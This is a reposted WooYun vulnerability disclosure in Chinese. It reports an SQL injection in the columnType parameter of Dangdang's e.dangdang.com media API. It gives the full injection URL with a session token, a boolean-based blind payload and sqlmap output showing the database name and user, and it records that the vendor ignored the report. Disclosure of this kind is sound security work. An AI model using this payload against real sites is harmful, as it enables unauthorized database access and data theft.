当当网某处SQL注入

admin

140350
文章

117
评论

2017年5月3日21:24:06评论382 views字数 219阅读0分43秒阅读模式

摘要

2016-04-17：细节已通知厂商并且等待厂商处理中
2016-04-17：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-22：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(13) 关注此漏洞

漏洞标题：当当网某处SQL注入

漏洞作者： null_z

提交时间： 2016-04-17 22:10

公开时间： 2016-04-22 22:20

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

2人收藏

漏洞详情

披露状态：

简要描述：

。。。

详细说明：

注入点

http://e.dangdang.com/media/api2.go?deviceSerialNo=8D47C214-7A36-465C-B722-F6D35E578467&clientOs=iPhone%2520OS7.1.1&columnType=all_aa*&platform=2&deviceType=iphone&isFull=1&channelId=10020&clientVersionNo=5.5.0&returnType=json&end=20&serverVersionNo=1.0&token=0d50506475bcaea555e6c0d9e933115e&macAddr=020000000000&orderSource=30000&fromPlatform=101&action=column&platformSource=DDDS-P&permanentId=20160416115048424116807875249950073&resolution=640x960&start=0

注入参数 columnType

漏洞证明：

6个数据库

code 区域

---
 Parameter: #1* (URI)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://e.dangdang.com:80/media/api2.go?deviceSerialNo=8D47C214-7A36-465C-B722-F6D35E578467&clientOs=iPhone%20OS7.1.1&columnType=all_aa' AND 2458=2458 AND 'LCQm'='LCQm&platform=2&deviceType=iphone&isFull=1&channelId=10020&clientVersionNo=5.5.0&returnType=json&end=20&serverVersionNo=1.0&token=0d50506475bcaea555e6c0d9e933115e&macAddr=020000000000&orderSource=30000&fromPlatform=101&action=column&platformSource=DDDS-P&permanentId=20160416115048424116807875249950073&resolution=640x960&start=0
 ---
 back-end DBMS: MySQL >= 5.0.0
 current database:    'digital'
 current user:    'reader@%'

修复方案：

。。。

版权声明：转载请注明来源 null_z@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-22 22:20

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-196960

漏洞标题： 当当网某处SQL注入

相关厂商： 当当网